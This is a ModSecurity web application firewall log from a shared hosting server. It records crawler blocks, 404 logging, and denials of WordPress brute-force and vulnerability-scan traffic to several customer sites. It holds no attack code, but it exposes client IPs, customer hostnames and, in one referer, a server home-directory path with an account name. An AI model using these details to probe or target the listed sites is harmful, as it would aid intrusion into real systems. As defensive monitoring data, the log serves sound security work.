[Tue May 26 14:36:44.882027 2026] [security2:error] [pid 626747:tid 626912] [client 202.141.83.254:19748] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVipBVF8Qmdmw_OMfL3eAAAAS0"]
[Tue May 26 14:36:45.024567 2026] [security2:error] [pid 626747:tid 626946] [client 114.119.139.1:63603] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVipRVF8Qmdmw_OMfL3fAAAAU8"], referer: http://glorodavionics.com/index.php?route=product/manufacturer/info&manufacturer_id=11&page=10
[Tue May 26 14:36:45.491791 2026] [security2:error] [pid 626747:tid 626881] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVipRVF8Qmdmw_OMfL3fwAAAQ4"]
[Tue May 26 14:36:46.980174 2026] [security2:error] [pid 626747:tid 626913] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahViphVF8Qmdmw_OMfL3qgAAAS4"], referer: https://anujtradingco.com
[Tue May 26 14:36:47.534391 2026] [security2:error] [pid 626747:tid 626978] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVipxVF8Qmdmw_OMfL3sAAAAW8"]
[Tue May 26 14:36:49.033289 2026] [security2:error] [pid 626747:tid 626930] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViqBVF8Qmdmw_OMfL32QAAAT8"]
[Tue May 26 14:36:50.192584 2026] [security2:error] [pid 626747:tid 626990] [client 5.102.173.71:0] ModSecurity: Warning. Matched phrase "Mojeek" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/robots.txt"] [unique_id "ahViqhVF8Qmdmw_OMfL39wAAAXs"]
[Tue May 26 14:36:50.193095 2026] [security2:error] [pid 626747:tid 626941] [client 5.102.173.71:33458] ModSecurity: Warning. Matched phrase "Mojeek" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/robots.txt"] [unique_id "ahViqhVF8Qmdmw_OMfL39QAAAUo"]
[Tue May 26 14:36:51.416572 2026] [security2:error] [pid 626747:tid 626989] [client 5.102.173.71:0] ModSecurity: Warning. Matched phrase "Mojeek" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahViqhVF8Qmdmw_OMfL4AAAAAXo"]
[Tue May 26 14:36:51.416792 2026] [security2:error] [pid 626747:tid 626934] [client 5.102.173.71:33458] ModSecurity: Warning. Matched phrase "Mojeek" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/what-is-meta-tags-in-seo-how-to-optimize-create/"] [unique_id "ahViqhVF8Qmdmw_OMfL3_gAAAUM"]
[Tue May 26 14:36:52.018730 2026] [security2:error] [pid 626747:tid 626979] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViqxVF8Qmdmw_OMfL4EgAAAXA"]
[Tue May 26 14:36:52.374017 2026] [security2:error] [pid 626747:tid 626984] [client 14.189.72.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVirBVF8Qmdmw_OMfL4JwAAAXU"], referer: http://www.Anujtradingco.com/
[Tue May 26 14:36:52.535344 2026] [security2:error] [pid 626747:tid 626964] [client 74.7.244.31:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "aeromodellingconsultants.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVirBVF8Qmdmw_OMfL4LQAAAWE"]
[Tue May 26 14:36:52.535999 2026] [security2:error] [pid 626747:tid 626899] [client 74.7.244.31:33680] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "aeromodellingconsultants.com"] [uri "/robots.txt"] [unique_id "ahVirBVF8Qmdmw_OMfL4KwABIFs"]
[Tue May 26 14:36:52.653109 2026] [security2:error] [pid 626747:tid 626921] [client 74.7.230.21:47116] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ntgpnk.in"] [uri "/index.php"] [unique_id "ahViqxVF8Qmdmw_OMfL4DgABNlo"]
[Tue May 26 14:36:52.779579 2026] [security2:error] [pid 626747:tid 626962] [client 14.189.72.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVirBVF8Qmdmw_OMfL4MQAAAV8"], referer: http://www.Anujtradingco.com/
[Tue May 26 14:36:53.371214 2026] [security2:error] [pid 626747:tid 626924] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVirBVF8Qmdmw_OMfL4NwAAATk"]
[Tue May 26 14:36:54.393087 2026] [security2:error] [pid 626747:tid 627004] [client 31.57.184.107:58063] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.redirefr.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVirhVF8Qmdmw_OMfL4ZgAAAYk"], referer: https://t.co/
[Tue May 26 14:36:55.497561 2026] [security2:error] [pid 626747:tid 626988] [client 202.141.83.254:5843] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVirxVF8Qmdmw_OMfL4hAAAAXk"]
[Tue May 26 14:36:55.497720 2026] [security2:error] [pid 626747:tid 626988] [client 202.141.83.254:5843] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVirxVF8Qmdmw_OMfL4hAAAAXk"]
[Tue May 26 14:36:56.198051 2026] [security2:error] [pid 626747:tid 626979] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVirxVF8Qmdmw_OMfL4mAAAAXA"]
[Tue May 26 14:36:56.612453 2026] [security2:error] [pid 626747:tid 626890] [client 74.249.173.207:40706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cuatrodoce.com.mx.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVisBVF8Qmdmw_OMfL4tAAAARc"]
[Tue May 26 14:36:58.172825 2026] [security2:error] [pid 626747:tid 626992] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVisRVF8Qmdmw_OMfL44AAAAX0"]
[Tue May 26 14:36:58.315481 2026] [security2:error] [pid 626747:tid 626907] [client 14.170.235.213:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVisRVF8Qmdmw_OMfL46wAAASg"]
[Tue May 26 14:37:00.066708 2026] [security2:error] [pid 626747:tid 626904] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVisxVF8Qmdmw_OMfL5GwAAASU"]
[Tue May 26 14:37:01.254834 2026] [security2:error] [pid 626747:tid 626978] [client 74.249.173.207:40708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cuatrodoce.com.mx.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVitRVF8Qmdmw_OMfL5OwAAAW8"]
[Tue May 26 14:37:02.077182 2026] [security2:error] [pid 626747:tid 626988] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVitRVF8Qmdmw_OMfL5QwAAAXk"]
[Tue May 26 14:37:04.119984 2026] [security2:error] [pid 626747:tid 626926] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVitxVF8Qmdmw_OMfL5hQAAATs"]
[Tue May 26 14:37:05.213107 2026] [security2:error] [pid 626747:tid 626768] [remote 185.198.240.129:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 129.240.198.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bigpapaairbnbhotel.com"] [uri "/wp-login.php"] [unique_id "ahViuBVF8Qmdmw_OMfL5oQABCxQ"]
[Tue May 26 14:37:05.742408 2026] [security2:error] [pid 626747:tid 626903] [client 202.141.83.254:53986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViuRVF8Qmdmw_OMfL5uwAAASQ"]
[Tue May 26 14:37:05.742534 2026] [security2:error] [pid 626747:tid 626903] [client 202.141.83.254:53986] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViuRVF8Qmdmw_OMfL5uwAAASQ"]
[Tue May 26 14:37:06.206962 2026] [security2:error] [pid 626747:tid 626902] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViuRVF8Qmdmw_OMfL5vgAAASM"]
[Tue May 26 14:37:08.638662 2026] [security2:error] [pid 626747:tid 626980] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVivBVF8Qmdmw_OMfL5-wAAAXE"]
[Tue May 26 14:37:10.265401 2026] [security2:error] [pid 626747:tid 626893] [client 85.208.96.210:56538] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahVivhVF8Qmdmw_OMfL6IAAAARo"]
[Tue May 26 14:37:10.265575 2026] [security2:error] [pid 626747:tid 626893] [client 85.208.96.210:56538] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahVivhVF8Qmdmw_OMfL6IAAAARo"]
[Tue May 26 14:37:10.429867 2026] [security2:error] [pid 626747:tid 626919] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVivhVF8Qmdmw_OMfL6GQAAATQ"]
[Tue May 26 14:37:11.911610 2026] [security2:error] [pid 626747:tid 626939] [client 147.53.121.158:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVivxVF8Qmdmw_OMfL6UAAAAUg"], referer: https://www.anujtradingco.com/
[Tue May 26 14:37:11.948276 2026] [security2:error] [pid 626747:tid 626884] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVivxVF8Qmdmw_OMfL6QAAAARE"]
[Tue May 26 14:37:13.106313 2026] [security2:error] [pid 626747:tid 626971] [client 147.53.121.158:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahViwRVF8Qmdmw_OMfL6dwAAAWg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 14:37:14.457187 2026] [security2:error] [pid 626747:tid 626880] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViwhVF8Qmdmw_OMfL6iQAAAQ0"]
[Tue May 26 14:37:15.523016 2026] [security2:error] [pid 626747:tid 626812] [remote 74.7.241.58:46428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahViwxVF8Qmdmw_OMfL6qAABPEA"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/fl
[Tue May 26 14:37:16.158047 2026] [security2:error] [pid 626747:tid 626985] [client 202.141.83.254:53985] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVixBVF8Qmdmw_OMfL6vQAAAXY"]
[Tue May 26 14:37:16.158152 2026] [security2:error] [pid 626747:tid 626985] [client 202.141.83.254:53985] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVixBVF8Qmdmw_OMfL6vQAAAXY"]
[Tue May 26 14:37:16.198847 2026] [security2:error] [pid 626747:tid 626979] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViwxVF8Qmdmw_OMfL6sAAAAXA"]
[Tue May 26 14:37:18.792368 2026] [security2:error] [pid 626747:tid 626894] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVixhVF8Qmdmw_OMfL7CQAAARs"]
[Tue May 26 14:37:19.026279 2026] [security2:error] [pid 626747:tid 626816] [remote 31.24.44.107:34060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVixhVF8Qmdmw_OMfL7FwABYUQ"]
[Tue May 26 14:37:20.689466 2026] [security2:error] [pid 626747:tid 626942] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViyBVF8Qmdmw_OMfL7WAAAAUs"]
[Tue May 26 14:37:22.352575 2026] [core:error] [pid 626747:tid 626910] [client 213.180.203.98:41318] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:37:22.352599 2026] [core:error] [pid 626747:tid 626910] [client 213.180.203.98:41318] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:37:22.681540 2026] [security2:error] [pid 626747:tid 626921] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViyhVF8Qmdmw_OMfL7pAAAATY"]
[Tue May 26 14:37:24.851914 2026] [security2:error] [pid 626747:tid 626964] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVizBVF8Qmdmw_OMfL76QAAAWE"]
[Tue May 26 14:37:26.634684 2026] [security2:error] [pid 626747:tid 626940] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVizhVF8Qmdmw_OMfL8LQAAAUk"]
[Tue May 26 14:37:26.742284 2026] [security2:error] [pid 626747:tid 626983] [client 202.141.83.254:53866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVizhVF8Qmdmw_OMfL8RQAAAXQ"]
[Tue May 26 14:37:26.742384 2026] [security2:error] [pid 626747:tid 626983] [client 202.141.83.254:53866] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVizhVF8Qmdmw_OMfL8RQAAAXQ"]
[Tue May 26 14:37:28.840155 2026] [security2:error] [pid 626747:tid 626994] [client 123.16.149.130:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi0BVF8Qmdmw_OMfL8ewAAAX8"]
[Tue May 26 14:37:28.912218 2026] [security2:error] [pid 626747:tid 626938] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi0BVF8Qmdmw_OMfL8fgAAAUc"]
[Tue May 26 14:37:29.026315 2026] [security2:error] [pid 626747:tid 626781] [remote 95.216.117.13:54128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVi0BVF8Qmdmw_OMfL8kwABQCE"]
[Tue May 26 14:37:30.903018 2026] [security2:error] [pid 626747:tid 626927] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi0hVF8Qmdmw_OMfL8wQAAATw"]
[Tue May 26 14:37:33.076563 2026] [security2:error] [pid 626747:tid 626982] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi1BVF8Qmdmw_OMfL9DAAAAXM"]
[Tue May 26 14:37:34.206070 2026] [security2:error] [pid 626747:tid 626790] [remote 46.101.75.237:58818] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVi1hVF8Qmdmw_OMfL9OQABOio"]
[Tue May 26 14:37:34.869770 2026] [security2:error] [pid 626747:tid 626913] [client 83.217.213.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVi1hVF8Qmdmw_OMfL9WgAAAS4"], referer: http://anujtradingco.com/pages/coming-soon/
[Tue May 26 14:37:35.281883 2026] [security2:error] [pid 626747:tid 626936] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi1hVF8Qmdmw_OMfL9XwAAAUU"]
[Tue May 26 14:37:36.978683 2026] [security2:error] [pid 626747:tid 626970] [client 202.141.83.254:53894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVi2BVF8Qmdmw_OMfL9oQAAAWc"]
[Tue May 26 14:37:36.978786 2026] [security2:error] [pid 626747:tid 626970] [client 202.141.83.254:53894] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVi2BVF8Qmdmw_OMfL9oQAAAWc"]
[Tue May 26 14:37:37.209292 2026] [security2:error] [pid 626747:tid 626908] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi2BVF8Qmdmw_OMfL9nwAAASk"]
[Tue May 26 14:37:39.182509 2026] [security2:error] [pid 626747:tid 626829] [remote 216.73.216.240:26129] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2021a-DrPunithaRajesh.php"] [unique_id "ahVi2xVF8Qmdmw_OMfL96wABHVE"]
